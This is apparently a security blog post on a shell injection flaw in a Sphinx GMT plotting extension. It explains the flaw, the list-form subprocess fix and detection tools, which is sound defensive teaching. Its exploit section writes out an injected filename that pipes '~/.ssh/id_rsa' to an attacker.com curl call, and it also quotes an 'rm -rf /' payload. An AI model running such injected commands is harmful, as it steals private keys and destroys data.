
Shell Injection in Sphinx Extensions: How a Docs Tool Became a Security Risk

A critical shell injection vulnerability was discovered and fixed in a Sphinx documentation extension (gmtplot.py), where subprocess calls using shell=True allowed arbitrary command execution through crafted filenames in RST documentation files. This fix demonstrates how even documentation tooling can become an attack vector when user-controlled input reaches shell interpreters without sanitization. Understanding and remediating this class of vulnerability is essential for any project that proce

By orbisai0security
May 11, 2026
#shell-injection #python #subprocess #command-injection #sphinx #documentation-security #secure-coding


Severity: Critical | CVE Class: Command Injection (CWE-78) | Fixed In: PR - "fix: sanitize subprocess call in gmtplot.py"


Introduction

When developers think about attack surfaces, they typically focus on web endpoints, authentication systems, or data storage. Rarely does anyone look twice at the documentation pipeline. Yet documentation tooling — especially custom Sphinx extensions that process contributor-supplied content — can harbor some of the most dangerous vulnerabilities in a codebase.

This post covers a critical shell injection vulnerability discovered and fixed in gmtplot.py, a custom Sphinx extension used to render GMT (Generic Mapping Tools) plots in documentation. The vulnerability allowed an attacker with the ability to contribute RST documentation files to execute arbitrary shell commands on any machine that built the documentation.

If your CI/CD pipeline builds docs automatically — and most modern projects do — this means remote code execution on your build infrastructure.


The Vulnerability Explained

What Is Shell Injection?

Shell injection (also known as OS command injection) occurs when an application passes unsanitized, user-controlled data to a system shell interpreter. When Python's subprocess.run() is called with shell=True, the entire command string is handed to /bin/sh for interpretation. This means the shell will parse and execute any valid shell syntax embedded in the string — including metacharacters like:

| Metacharacter | Effect |
|---|---|
| ; | Execute next command sequentially |
| \| | Pipe output to another command |
| && | Execute next command if first succeeds |
| ` ` | Command substitution (backticks) |
| $() | Command substitution (modern syntax) |
| > / >> | Redirect output to a file |
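The effect of a few of these metacharacters can be observed with harmless, fully hardcoded commands. This is a minimal sketch, assuming a POSIX system with echo and tr on the PATH; the run_in_shell helper is hypothetical and does not appear in gmtplot.py.

```python
import subprocess


def run_in_shell(command: str) -> str:
    """Run a hardcoded command string through the shell and return its stdout."""
    return subprocess.run(
        command, shell=True, capture_output=True, text=True, check=True
    ).stdout


# ';' runs a second command after the first one finishes
sequential = run_in_shell("echo one; echo two")

# '$()' replaces itself with the output of the inner command
substituted = run_in_shell("echo $(echo nested)")

# '|' feeds the first command's stdout into the second command
piped = run_in_shell("echo hello | tr a-z A-Z")

print(repr(sequential))   # 'one\ntwo\n'
print(repr(substituted))  # 'nested\n'
print(repr(piped))        # 'HELLO\n'
```

In each case a single Python string produced more than one process. That is exactly the capability an attacker gains when part of the string is under their control.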

The Vulnerable Code

In docs/source/_extensions/gmtplot.py, at lines 173, 174, and 197, the extension invoked subprocess.run() like this:

# VULNERABLE CODE (before fix)
import subprocess

# ps_images[0] is derived from user-supplied RST documentation content
ps_file = ps_images[0]

# shell=True + unsanitized input = shell injection
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(f"gmt psconvert {ps_file} -A -Tf", shell=True)

# Also vulnerable at line 197
subprocess.run(f"convert {ps_file} output.png", shell=True)

The variable ps_images[0] is a file path derived from the processing of RST source files — content that documentation contributors control.

How Could It Be Exploited?

An attacker who can submit a pull request (or directly push to a branch) containing RST documentation files can craft a filename or directive that injects shell commands. Here's a concrete example:

Step 1: The attacker contributes an RST file containing a GMT plot directive with a malicious path:

.. gmtplot::
    :caption: Innocent-looking map

    # Script that generates a file with a dangerous name

Step 2: The extension processes this and constructs a path like:

legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) #

Step 3: When subprocess.run() executes with shell=True, the shell sees:

gmt psconvert legitimate_plot.ps; curl https://attacker.com/exfil?data=$(cat ~/.ssh/id_rsa | base64) # -A -Tg

The shell dutifully executes both the legitimate GMT command and the attacker's injected command.
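The three steps can be reproduced safely by swapping in harmless stand-ins. In the sketch below, echo replaces gmt psconvert and the injected payload is another echo rather than the curl call; both substitutions are assumptions made so the example runs without GMT installed, and a POSIX shell is assumed.

```python
import subprocess

# Stand-in for the path the extension would derive from RST content.
# The injected command is a harmless echo, followed by '#' as in the example above.
ps_file = "legitimate_plot.ps; echo INJECTED #"

# 'echo' stands in for 'gmt psconvert'; the string is built the same way
# as in the vulnerable code.
command = f"echo {ps_file} -A -Tg"

completed = subprocess.run(command, shell=True, capture_output=True, text=True)
lines = completed.stdout.splitlines()

# The first line comes from the intended command, the second from the injected one.
# ' -A -Tg' never shows up because '#' turned it into a shell comment.
print(lines)  # ['legitimate_plot.ps', 'INJECTED']
```

The trailing # matters to the attacker: it discards the flags that the extension appends, so the injected command is not followed by stray arguments.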

Real-World Impact

The consequences depend on the context in which documentation is built, but consider:

  • CI/CD Compromise: Most projects auto-build docs in pipelines. A malicious PR could exfiltrate secrets, install backdoors, or pivot to internal infrastructure.
  • Developer Machine Compromise: Any developer who checks out the branch and runs make html locally becomes a victim.
  • Supply Chain Attack: If documentation is built as part of a release process, an attacker could tamper with build artifacts or inject malicious code into published packages.
  • Secret Exfiltration: Build environments commonly contain API keys, cloud credentials, SSH keys, and deployment tokens — all accessible to injected commands.

This is not theoretical. Similar vulnerabilities have been exploited in CI/CD systems to steal secrets and compromise software supply chains.


The Fix

What Changed?

The fix eliminates the root cause by removing shell=True and passing the command as a list of arguments instead of a single string. When subprocess.run() receives a list and shell is left at its default of False, Python starts the program directly (on POSIX, through an exec-family call such as execvp()). No shell is involved, so no shell metacharacter interpretation occurs.

# FIXED CODE (after fix)
import subprocess

# ps_images[0] is still user-derived, but now safely handled
ps_file = ps_images[0]

# Pass as a list — no shell involved, metacharacters are treated as literals
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tf"], check=True)

# Also fixed at line 197
subprocess.run(["convert", ps_file, "output.png"], check=True)

Why This Works

When you pass a list to subprocess.run():

  1. Python calls os.execvp() (or equivalent) directly
  2. The operating system treats each list element as a discrete argument
  3. No shell is spawned, so no shell parsing occurs
  4. A filename like file.ps; rm -rf / is passed literally as the filename argument to gmt psconvert — the semicolon is just a character, not a command separator

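The shell injection is neutralized because the shell, the interpreter that gives metacharacters their power, is never invoked. List form does not address argument injection (CWE-88), though: a filename that begins with - may still be read as an option by the program that receives it, which is one reason input validation remains worthwhile.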
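What the child process actually receives can be checked directly. The sketch below uses a small child Python process as a stand-in for gmt psconvert (an assumption, so that it runs anywhere Python does); the argv_seen_by_child helper is hypothetical. Nothing here is executed by a shell, so the rm in the payload never runs.

```python
import json
import subprocess
import sys


def argv_seen_by_child(args: list[str]) -> list[str]:
    """Start a child process in list form and return the arguments it received."""
    child_code = "import json, sys; print(json.dumps(sys.argv[1:]))"
    completed = subprocess.run(
        [sys.executable, "-c", child_code, *args],
        capture_output=True,
        text=True,
        check=True,
    )
    return json.loads(completed.stdout)


# The payload arrives as one argument; ';' is an ordinary character in it.
payload = "file.ps; rm -rf /"
received = argv_seen_by_child([payload, "-A", "-Tg"])
print(received)  # ['file.ps; rm -rf /', '-A', '-Tg']
```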

Additional Hardening (Defense in Depth)

Beyond the primary fix, consider these additional hardening measures:

import subprocess
from pathlib import Path

def safe_convert(ps_file: str, output_dir: str) -> None:
    """Convert a PS file with GMT after validating the input path."""

    # 1. Validate that the file exists and lies within the expected directory
    #    (Path.is_relative_to requires Python 3.9+)
    ps_path = Path(ps_file).resolve()
    allowed_base = Path(output_dir).resolve()

    if not ps_path.is_relative_to(allowed_base):
        raise ValueError(f"Path traversal detected: {ps_file}")
    if not ps_path.is_file():
        raise FileNotFoundError(f"No such file: {ps_file}")

    # 2. Validate file extension
    if ps_path.suffix.lower() not in ('.ps', '.eps'):
        raise ValueError(f"Unexpected file type: {ps_path.suffix}")

    # 3. Use list form (no shell=True): primary defense
    subprocess.run(
        ["gmt", "psconvert", str(ps_path), "-A", "-Tg"],
        capture_output=True,
        text=True,
        timeout=60,  # 4. Add timeout to prevent resource exhaustion
        check=True,  # 5. Raise on non-zero exit code
    )
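List form keeps the shell out of the picture, but the receiving program still parses its own arguments, which is the CWE-88 case listed under Relevant Security Standards. safe_convert above sidesteps this because a resolved path is absolute and starts with /. Where a relative name is passed through unchanged, one common guard is to prefix it with ./ so it cannot begin with a dash. The as_operand helper below is a hypothetical sketch, and whether gmt psconvert would treat a dash-prefixed filename as an option is an assumption, not something the original fix documents.

```python
def as_operand(filename: str) -> str:
    """Return the filename in a form that cannot be mistaken for an option."""
    if filename.startswith("-"):
        # './-Tg.ps' names the same file as '-Tg.ps' but no longer looks like a flag
        return "./" + filename
    return filename


# Build (but do not run) the argument list for a hostile-looking name.
argv = ["gmt", "psconvert", as_operand("-Tg.ps"), "-A", "-Tg"]
print(argv)  # ['gmt', 'psconvert', './-Tg.ps', '-A', '-Tg']
```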

Prevention & Best Practices

The Golden Rule: Never Use shell=True with External Input

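This is the single most important takeaway. The Security Considerations section of Python's subprocess documentation makes the same point: when the shell is invoked explicitly via shell=True, it is the application's responsibility to ensure that all whitespace and metacharacters are quoted appropriately to avoid shell injection vulnerabilities.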

Follow this decision tree:

Do you need shell features (pipes, redirects, globs)?
├── YES  Can you redesign to avoid them?
│         ├── YES  Redesign (preferred)
│         └── NO   Use shell=True ONLY with fully hardcoded strings
│                   Never interpolate external data
└── NO   Always use shell=False (list form)
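The "redesign" branch is often easier than it sounds. A shell pipeline such as producer | sort can be rebuilt by connecting two processes in Python, following the pattern the subprocess documentation describes for replacing shell pipelines. The sketch below assumes a POSIX system with sort on the PATH and uses a child Python process as a stand-in producer.

```python
import subprocess
import sys

# Producer: a child Python process standing in for any tool that writes lines.
producer = subprocess.Popen(
    [sys.executable, "-c", "print('b'); print('a')"],
    stdout=subprocess.PIPE,
)

# Consumer: 'sort' reads the producer's stdout directly, with no shell in between.
consumer = subprocess.Popen(
    ["sort"],
    stdin=producer.stdout,
    stdout=subprocess.PIPE,
    text=True,
)

# Close our copy of the pipe so the producer gets SIGPIPE if sort exits early.
producer.stdout.close()
sorted_output, _ = consumer.communicate()
producer.wait()

print(repr(sorted_output))  # 'a\nb\n'
```

Redirects can be handled the same way by passing an open file object as stdout, and globs by expanding them in Python with pathlib or glob before building the argument list.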

Input Validation and Allowlisting

When you must work with user-supplied paths or filenames, validate them strictly:

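import re

def validate_plot_filename(filename: str) -> bool:
    """Allowlist-based filename validation."""
    # Allow only a base name of letters, digits, underscores, and hyphens,
    # followed by a .ps or .eps extension. The name must start with a letter
    # or digit so it cannot be mistaken for a command-line option, and
    # fullmatch() rejects a trailing newline that '$' would let through.
    # '/' and '..' cannot match, so path traversal is excluded as well.
    pattern = r'[a-zA-Z0-9][a-zA-Z0-9_\-]*\.(ps|eps)'
    return re.fullmatch(pattern, filename) is not None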

Use shlex.quote() as a Last Resort

If you absolutely cannot avoid shell=True, use shlex.quote() to escape arguments:

import shlex
import subprocess

# Last resort only — prefer list form instead
safe_path = shlex.quote(ps_file)
subprocess.run(f"gmt psconvert {safe_path} -A -Tg", shell=True)

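⚠️ Warning: This is a mitigation, not a cure. shlex.quote() is designed for POSIX shells only, and every interpolated value must be quoted individually. The list-form approach is always preferred.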
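To see what shlex.quote() does to a hostile value, the sketch below quotes a payload and passes it through a POSIX shell, with echo again standing in for gmt psconvert (an assumption so that the example runs without GMT).

```python
import shlex
import subprocess

ps_file = "plot.ps; echo INJECTED"

# quote() wraps the value in single quotes so the shell sees one literal word
quoted = shlex.quote(ps_file)
print(quoted)  # 'plot.ps; echo INJECTED'

out = subprocess.run(
    f"echo {quoted}", shell=True, capture_output=True, text=True
).stdout
print(repr(out))  # 'plot.ps; echo INJECTED\n'

# Embedded single quotes are closed, escaped, and reopened
print(shlex.quote("it's.ps"))  # 'it'"'"'s.ps'
```

The semicolon reaches echo as text instead of ending the command. The protection holds only as long as no interpolated value is ever left unquoted, which is why list form is the more robust choice.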

Relevant Security Standards

| Standard | Reference | Description |
|---|---|---|
| OWASP | A03:2021 – Injection | Injection ranks #3 in OWASP Top 10 |
| CWE | CWE-78 | OS Command Injection |
| CWE | CWE-88 | Argument Injection |
| SANS | CWE/SANS Top 25 | Most Dangerous Software Errors |

Detection Tools

Add these to your security pipeline to catch similar issues:

  • Bandit: Python-specific SAST tool. Rule B602 flags subprocess calls made with shell=True; B603 flags subprocess calls made without shell=True so that their arguments still get reviewed for untrusted input.
        pip install bandit
        bandit -r . -t B602,B603
  • Semgrep: Pattern-based code scanning with rules for subprocess misuse
        semgrep --config "p/python" .
  • CodeQL: GitHub's semantic code analysis; has built-in queries for command injection
  • Safety: Scans Python dependencies for known vulnerabilities (useful alongside the tools above, although it does not inspect your own subprocess calls)
  • Pre-commit hooks: Run Bandit automatically before every commit
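To get a feel for what this kind of static check looks for, here is a deliberately simplified sketch built on Python's ast module. It is not how Bandit or Semgrep are implemented, and the find_shell_true_calls name is hypothetical; it only reports calls that pass the literal keyword shell=True.

```python
import ast


def find_shell_true_calls(source: str) -> list[int]:
    """Return the line numbers of calls that pass the literal keyword shell=True."""
    hits = []
    for node in ast.walk(ast.parse(source)):
        if not isinstance(node, ast.Call):
            continue
        for keyword in node.keywords:
            if (
                keyword.arg == "shell"
                and isinstance(keyword.value, ast.Constant)
                and keyword.value.value is True
            ):
                hits.append(node.lineno)
    return sorted(hits)


# The source is only parsed, never executed, so ps_file need not exist.
sample = '''import subprocess
subprocess.run(f"gmt psconvert {ps_file} -A -Tg", shell=True)
subprocess.run(["gmt", "psconvert", ps_file, "-A", "-Tg"], check=True)
'''

print(find_shell_true_calls(sample))  # [2]
```

A real scanner also has to handle cases this sketch misses, such as shell=some_variable, os.system(), and wrappers around subprocess, which is a good reason to rely on the maintained tools.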

Secure Code Review Checklist

When reviewing code that invokes subprocesses, ask:

  • [ ] Is shell=True used? If so, is it absolutely necessary?
  • [ ] Does any part of the command string come from external input (files, environment, user input, network)?
  • [ ] Are file paths validated against an allowlist of expected directories?
  • [ ] Is there a timeout to prevent resource exhaustion?
  • [ ] Are errors handled to prevent information leakage via exception messages?
  • [ ] Is the principle of least privilege applied (does the process need all these permissions)?
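The timeout and error-handling items can be combined in one small wrapper. The sketch below is one possible shape, not code from the fix; ToolError and run_tool are hypothetical names, and the demonstration uses child Python processes in place of gmt.

```python
import subprocess
import sys


class ToolError(RuntimeError):
    """Raised with a short message that omits the child's output."""


def run_tool(argv: list[str], timeout: float = 60.0) -> str:
    """Run a command in list form and return stdout, hiding details on failure."""
    try:
        completed = subprocess.run(
            argv, capture_output=True, text=True, timeout=timeout, check=True
        )
    except subprocess.TimeoutExpired:
        raise ToolError(f"{argv[0]} timed out after {timeout} s") from None
    except subprocess.CalledProcessError as exc:
        # Report only the exit status; stderr may contain paths or secrets.
        raise ToolError(f"{argv[0]} exited with status {exc.returncode}") from None
    except FileNotFoundError:
        raise ToolError(f"{argv[0]} is not installed or not on PATH") from None
    return completed.stdout


print(repr(run_tool([sys.executable, "-c", "print('ok')"])))  # 'ok\n'
```

Using from None drops the chained exception, so the child's captured output does not end up in a traceback printed to a public CI log. Whether to log that output somewhere private is a separate decision.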

A Note on Documentation Pipelines

This vulnerability highlights a frequently overlooked truth: your documentation pipeline is part of your attack surface.

Modern documentation workflows often include:

  • Automatic builds triggered by pull requests from external contributors
  • Sphinx extensions that execute code to generate examples and plots
  • Jupyter notebooks rendered as documentation
  • Auto-generated API docs that execute import statements

Each of these is a potential code execution vector. Treat your documentation build environment with the same security rigor as your production build:

  1. Sandbox doc builds in isolated environments with no access to production secrets
  2. Require review before building PRs from first-time contributors
  3. Use separate secret stores — doc build environments should not have the same credentials as release pipelines
  4. Audit custom Sphinx extensions — they often run with full filesystem and network access
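One inexpensive step in this direction, inside an extension itself, is to give child processes an allowlisted environment instead of a copy of the parent's. The sketch below assumes a POSIX system; ALLOWED_ENV, minimal_env, and the FAKE_DEPLOY_TOKEN variable are all hypothetical and exist only for the demonstration.

```python
import os
import subprocess
import sys

# Hypothetical allowlist: only these variables are passed on to child processes.
ALLOWED_ENV = ("PATH", "HOME", "LANG")


def minimal_env() -> dict[str, str]:
    """Build an environment containing only the allowlisted variables."""
    return {name: os.environ[name] for name in ALLOWED_ENV if name in os.environ}


# Simulate a secret that a CI system might export into the build environment.
os.environ["FAKE_DEPLOY_TOKEN"] = "not-a-real-secret"

child_code = "import os; print(os.environ.get('FAKE_DEPLOY_TOKEN'))"
seen = subprocess.run(
    [sys.executable, "-c", child_code],
    env=minimal_env(),
    capture_output=True,
    text=True,
    check=True,
).stdout.strip()

print(seen)  # None
```

This only limits what a child process inherits through its environment. Files on disk, network access, and the parent process are untouched, so it complements isolated build environments and does not replace them.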

Conclusion

A single shell=True in a documentation extension turned a benign plot-rendering tool into a potential remote code execution vulnerability. The fix was straightforward — replace string interpolation with a properly structured argument list — but the implications were significant.

Key takeaways:

  1. shell=True + user input = shell injection. This is one of the most reliable rules in security.
  2. Documentation tooling is an attack surface. CI/CD pipelines that auto-build docs are especially at risk.
  3. The fix is simple: use subprocess.run(["cmd", "arg1", "arg2"]) instead of subprocess.run(f"cmd {arg}", shell=True).
  4. Layer your defenses: input validation, path restrictions, and static analysis tools complement the primary fix.
  5. Automate detection: Bandit and Semgrep can catch these issues before they reach production.

Security vulnerabilities don't only live in authentication systems and API endpoints. They hide in build scripts, test helpers, and documentation generators — the parts of a codebase that developers trust implicitly. The best defense is consistent, skeptical review of any code that touches external input, regardless of how "internal" it seems.

Secure every layer. Trust no input.


This vulnerability was identified and fixed as part of an automated security scanning process. If you maintain Sphinx extensions or other documentation tooling that invokes subprocesses, audit your code for similar patterns today.

References: CWE-78 | OWASP Injection | Python subprocess docs | Bandit B602

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #246
